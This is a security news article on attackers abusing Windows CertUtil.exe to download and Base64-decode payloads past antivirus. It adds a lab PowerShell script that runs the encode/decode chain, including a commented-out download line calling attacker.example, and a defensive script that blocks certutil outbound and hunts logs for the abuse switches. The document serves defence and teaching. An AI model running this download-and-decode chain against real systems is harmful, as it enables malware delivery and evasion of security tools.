CertUtil.exe lets attackers download malicious code and bypass antivirus software
Windows ships with a built-in command-line tool, CertUtil, for managing certificates. With CertUtil you can install, back up, delete and otherwise manage certificates, and perform other certificate-related functions.
One of CertUtil's features is downloading a certificate, or any other file, from a URL and saving it to disk: certutil.exe -urlcache -split -f [URL] output.file
Security researcher Casey Smith warned in 2017 that this method could be used to download malicious code. The technique had already been seen in use in 2016, and in March a Trojan used it to download a series of files and scripts to the infected computer.
Attackers still turn to CertUtil because some computers are locked down so that unknown software cannot download files. A built-in, Microsoft-signed Windows tool is likely to be whitelisted and allowed to make outbound connections.
CertUtil in use by a recent Trojan
Using CertUtil and Base64 to bypass antivirus software
Security consultant Xavier Mertens recently described another way to use CertUtil: the malicious file is first Base64-encoded so that scanners see only a harmless-looking text blob, downloaded with CertUtil.exe, and then decoded back into the original binary on the victim machine with certutil.exe -decode.
Command to download files with CertUtil:
certutil.exe -urlcache -split -f [URL] output.file
MalwareHunterTeam reports that certutil.exe -decode has been used in the wild. F5 Labs has also detailed a campaign that used CertUtil.exe to install a cryptocurrency miner, and Fabio Assolini of Kaspersky has warned that the method was used in attacks in Brazil.
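The following lab script is an added example, not code from the article or from any of the researchers it cites. It walks the chain described above (the download command and the Base64 encode/decode step) on a single Windows host so you can see what each stage leaves on disk. It assumes you run it in a scratch folder; payload.bin is a constructed sample, and http://attacker.example/payload.txt is a placeholder for a web server you control.

```powershell
# Added lab example: the CertUtil + Base64 chain on one host (not the article's code).
# Assumptions: scratch folder under %TEMP%, constructed sample bytes, placeholder URL.

$Work = Join-Path $env:TEMP "certutil-lab"
New-Item -ItemType Directory -Force -Path $Work | Out-Null
Set-Location $Work

# Stage 0 (attacker side): some binary content to smuggle. Constructed sample, not malware.
[byte[]]$sample = 0..255
[System.IO.File]::WriteAllBytes("$Work\payload.bin", $sample)

# Stage 1 (attacker side): Base64-wrap it. certutil -encode emits a PEM-style file with
# CERTIFICATE headers, which is why the artifact passes as a harmless certificate at a glance.
certutil.exe -encode payload.bin payload.txt | Out-Null
Get-Content payload.txt -TotalCount 1      # prints -----BEGIN CERTIFICATE-----

# Stage 2 (victim side): fetch the wrapped file with the built-in, signed tool.
# Placeholder URL (assumption); replace with a server you control before uncommenting.
# certutil.exe -urlcache -split -f "http://attacker.example/payload.txt" payload.txt

# Stage 3 (victim side): unwrap it back into the original bytes.
certutil.exe -decode payload.txt restored.bin | Out-Null

# Check: the round trip is byte-exact, so the "certificate" was the binary all along.
$before = (Get-FileHash payload.bin -Algorithm SHA256).Hash
$after  = (Get-FileHash restored.bin -Algorithm SHA256).Hash
if ($before -eq $after) { "round trip OK: $after" } else { throw "decode mismatch" }
```

Note that certutil -decode also accepts bare Base64 without the BEGIN/END lines, so the absence of the certificate headers in a suspicious text file is not evidence that it is harmless.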
New tricks for abusing legitimate, trusted Windows programs appear all the time. If you do not need CertUtil to fetch certificates from remote servers, block the tool's network connectivity.
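The following script is an added example, not from the article, of how an administrator can act on that advice: it blocks outbound connections from certutil.exe with a Windows Firewall rule and then hunts process-creation logs for the switches used in the abuse described above. It assumes it is run as Administrator and that command-line logging is already enabled (Sysmon Event ID 1, or Security event 4688 with the "Include command line in process creation events" policy turned on); without that, the 4688 events carry no command line and the hunt finds nothing.

```powershell
# Added example: restrict and hunt for CertUtil network use (not the article's code).
# Assumptions: run as Administrator; Sysmon or 4688 command-line logging already enabled.

# 1. Block outbound connections from both copies of certutil.exe (64-bit and WOW64).
$targets = @("$env:SystemRoot\System32\certutil.exe", "$env:SystemRoot\SysWOW64\certutil.exe")
foreach ($exe in $targets) {
    if (Test-Path $exe) {
        New-NetFirewallRule -DisplayName "Block outbound: $exe" -Direction Outbound `
            -Program $exe -Action Block -Profile Any -Enabled True | Out-Null
    }
}

# 2. Hunt: process-creation events whose command line shows the switches from this article.
$pattern = '(?i)certutil(\.exe)?.*\s-(urlcache|decode|encode)\b'
$sysmon = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } `
    -ErrorAction SilentlyContinue | Where-Object { $_.Message -match $pattern }
$security = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } `
    -ErrorAction SilentlyContinue | Where-Object { $_.Message -match $pattern }

# Sysmon writes "CommandLine:", 4688 writes "Process Command Line:"; pull either one out.
@($sysmon) + @($security) |
    Select-Object TimeCreated, Id,
        @{ n = 'CommandLine'; e = { ($_.Message -split "`n" | Where-Object { $_ -match 'Command ?Line:' }) -join ' ' } } |
    Format-Table -AutoSize

# 3. Forensic check: certutil keeps its own URL cache. With no URL argument it lists what has
# been fetched through it; an empty list on a host with suspicious 4688/Sysmon hits may mean
# the attacker cleared it with "certutil -urlcache * delete".
certutil.exe -urlcache
```

Blocking certutil.exe in the firewall stops the download stage, but not certutil.exe -decode of a file that arrived another way; the event-log hunt covers that case, which is why both halves are needed.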